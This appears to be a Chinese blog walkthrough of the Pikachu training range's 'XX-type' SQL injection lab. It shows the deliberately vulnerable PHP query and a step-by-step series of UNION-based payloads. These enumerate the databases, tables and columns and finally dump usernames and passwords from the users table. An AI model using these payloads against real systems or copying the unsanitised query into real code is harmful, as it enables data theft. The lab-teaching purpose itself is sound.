pikachu的XX型注入

pikachu的XX型注入

一、实例讲解:

通过查看源码发现与搜索型类似,但是测试发现拼接闭合的语句不同,查看源码发现是括号闭合,所以可以得到payload的类型是多变的,所以原理方法与搜索型类似,通过构造payload语句来达到注入的目的。但实际渗透测试过程中不可能得到目标网站的源码,这时候就需要根据经验和多测试。比如发现一个输入框,就首先进行单双引号测试aaa” or 1=1# 或者 aaa) or 1=1#等。
源码:

if(isset($_GET['submit']) && $_GET['name']!=null){
    //这里没有做任何处理,直接拼到select里面去了
    $name=$_GET['name'];
    //这里的变量是字符型,需要考虑闭合
    $query="select id,email from member where username=('$name')";
    $result=execute($link, $query);
    if(mysqli_num_rows($result)>=1){
        while($data=mysqli_fetch_assoc($result)){
            $id=$data['id'];
            $email=$data['email'];
            $html.="<p class='notice'>your uid:{$id} <br />your email is: {$email}</p>";
        }
    }else{

        $html.="<p class='notice'>您输入的username不存在,请重新输入!</p>";
    }
}

二、实验步骤:

1、通过构造payload语句发现回显正常,说明此处我们构造的语句已经被正常的传到数据库中,并且参与了数据库的查询运算。

1') or 1=1

在这里插入图片描述
2、然后使用联合查询法判断字段数,将刚才构造的语句中or 1=1替换成order by 1来判断字段发现回显正常,当变成order by 3时我们发现会先报错了,说明此处字段为2。

xx')  order by 1 #

在这里插入图片描述

xx')  order by 3 #

在这里插入图片描述
3、通过联合查询法构造union select 1,2语句来显示字段。

xx') union select 1,2 #

在这里插入图片描述
4、通过联合查询法查询数据库库名。

xx')  union select 1,group_concat(schema_name) from information_schema.schemata #

在这里插入图片描述
5、通过上一步联合查询法我们得到靶场上存在的数据库库名,接下来我们查看一下这个数据库里面存在哪些表。

xx')  union select 1,group_concat(table_name) from information_schema.tables where table_schema='pikachu'#

在这里插入图片描述
6、通过查询pikachu这个数据库发现里面有users表,然后在查看users表里面存在哪些表项。

xx') union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

在这里插入图片描述
7、通过查询users表发现表里存在2个表项分别是username和password,最后分别查看一下这两个表项的内容得到用户名和密码。

xx') union select 1,username from users username #

在这里插入图片描述

xx') union select 1,password from users password #

在这里插入图片描述

  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pikachu靶场中的XX注入是指在进行数据库注入漏洞测试时,通过查询pikachu数据库中的users表来获取表项的信息。具体步骤如下: 1. 首先,进行注入点的探测,通过使用order by语句来试探查询语句所用的列名个数。 2. 然后,通过查询pikachu数据库发现其中存在users表。 3. 接着,通过构造闭合的方式,使用union select语句来查询users表中的表项信息。例如,可以使用以下语句来查询users表中的列名: - xx') union select 1,group_concat(column_name) from information_schema.columns where table_name='users'# 这个语句中,xx是闭合注入点的符号,group_concat(column_name)用来合并多个列名结果,information_schema.columns用来获取表的列信息,where table_name='users'用来指定查询的是users表。 4. 最后,执行以上查询语句,即可获取到users表中的表项信息。 需要注意的是,在进行构造闭合的时候,要注意使用括号和单引号进行对应,以确保闭合的正确性。 总结起来,pikachu靶场中的XX注入是通过查询pikachu数据库的users表来获取表项信息的一种注入漏洞。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Pikachu靶场:SQL-Inject之xx注入](https://blog.csdn.net/witwitwiter/article/details/115939955)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [pikachuXX注入](https://blog.csdn.net/weixin_50339082/article/details/117908133)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值